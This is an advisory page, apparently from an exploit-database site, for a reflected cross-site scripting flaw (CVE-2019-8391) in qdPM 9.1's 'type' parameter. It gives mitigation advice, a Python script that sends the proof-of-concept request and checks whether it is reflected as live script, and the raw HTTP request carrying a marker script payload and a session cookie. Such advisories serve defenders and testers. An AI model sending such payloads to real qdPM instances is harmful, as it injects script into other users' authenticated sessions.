Vendor: qdPM
By: Mehmet EMIROGLU
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: qdPM
Affected Version From: v9.1
Affected Version To: v9.1
Patch Exists: YES
Related CVE: CVE-2019-8391
CPE: a:qdpm:qdpm:9.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Wamp64, Windows
Year: 2019

qdPM 9.1 – ‘type’ XSS Injection

qdPM is a free web-based project management tool suitable for a small team working on multiple projects. Version 9.1 is vulnerable to Cross-Site Scripting (XSS) through the 'type' parameter of the configuration page (index.php/configuration): the parameter value is echoed into the response without HTML encoding, so a script tag placed in the parameter is returned as live markup. An attacker who gets a user to open a crafted link has the injected JavaScript executed in that user's browser. The proof of concept below sends the request with a qdPM session cookie, so the practical target is a user who is logged in to qdPM.

Mitigation:

Upgrade to a release that contains the vendor's fix. In code, the primary defence is output encoding: HTML-encode the 'type' value (and any other user-supplied value) at the point where it is written into the page, so that '<' and '>' reach the browser as entities rather than as markup. Input validation (accepting only the expected values for 'type') is a useful second layer but is not sufficient on its own. Setting the HttpOnly flag on the qdPM session cookie limits what injected script can steal but does not prevent the injection; a Content-Security-Policy that disallows inline script would stop this payload class from executing.
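The reflection and the fix described above, as an added example that is not part of the advisory or of qdPM's own code. It builds the PoC URL from the advisory's payload, classifies whether a response body reflects the marker as an executable script element (using an HTML parser rather than a substring match, so a reflection stuck inside an attribute value is not miscounted as a working exploit), and shows the output-encoding fix next to the vulnerable echo. The page templates, the base URL and the session cookie handling are constructed stand-ins; qdPM's real markup around 'type' is not reproduced here.

```python
import html
import sys
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Marker and payload are the ones from the advisory's PoC; the marker is a
# function call no legitimate page would contain, so its presence is unambiguous.
MARKER = "bKtx(9366)"
PAYLOAD = f"tasks_columns_list<script>{MARKER}</script>"


def build_poc_url(base_url: str, payload: str = PAYLOAD) -> str:
    """URL of the configuration page with the payload URL-encoded into 'type'.

    The raw '<' and '>' are percent-encoded; PHP decodes them back before the
    value is echoed, so the server sees the same string as in the advisory.
    """
    query = urllib.parse.urlencode({"type": payload})
    return f"{base_url.rstrip('/')}/index.php/configuration?{query}"


class _ScriptMarkerFinder(HTMLParser):
    """Sets .found only when MARKER is the text content of a real <script> element."""

    def __init__(self, marker: str) -> None:
        super().__init__()
        self.marker = marker
        self._in_script = False
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script and self.marker in data:
            self.found = True


def reflection_state(body: str, marker: str = MARKER) -> str:
    """Classify how the marker comes back in a response body.

    'executable'      -> a live <script> element carries the marker: the
                         parameter was echoed without HTML encoding.
    'reflected_inert' -> the marker is present but not as script text
                         (entity-encoded, or inside a quoted attribute value);
                         this exact payload does not run, which is not proof
                         that another payload would not.
    'absent'          -> the parameter is not reflected at all.
    """
    finder = _ScriptMarkerFinder(marker)
    finder.feed(body)
    finder.close()
    if finder.found:
        return "executable"
    if marker in body:
        return "reflected_inert"
    return "absent"


# Constructed page templates (assumption: not qdPM's real markup) showing
# the vulnerable echo and the fix side by side.
def render_vulnerable(type_param: str) -> str:
    """Writes the parameter straight into the page, as the vulnerable version does."""
    return f"<html><body><h2>Configuration: {type_param}</h2></body></html>"


def render_fixed(type_param: str) -> str:
    """HTML-encodes at the output point (the PHP htmlspecialchars equivalent)."""
    safe = html.escape(type_param, quote=True)
    return f"<html><body><h2>Configuration: {safe}</h2></body></html>"


def check_live(base_url: str, session_cookie: str) -> str:
    """Send the PoC to a running instance and classify the reflection.

    The advisory's PoC is an authenticated request, so a session cookie
    (e.g. 'qdPM8=...') is required. This is the only function that uses the network.
    """
    req = urllib.request.Request(build_poc_url(base_url), headers={"Cookie": session_cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return reflection_state(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline demonstration on the constructed templates.
    print("vulnerable:", reflection_state(render_vulnerable(PAYLOAD)))  # executable
    print("fixed:     ", reflection_state(render_fixed(PAYLOAD)))       # reflected_inert
    if len(sys.argv) == 3:  # usage: xss_check.py http://localhost/qdpm 'qdPM8=...'
        print("live:      ", check_live(sys.argv[1], sys.argv[2]))
```

Run with no arguments to see the two offline classifications; pass a base URL and a valid session cookie to test an instance you are authorised to assess. The parser-based check is deliberately narrow: it confirms the advisory's payload, not the absence of XSS in other contexts.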

Exploit-DB raw data:

===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
  Free project management tool for small team
  qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
  It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
  using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET /qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script> HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*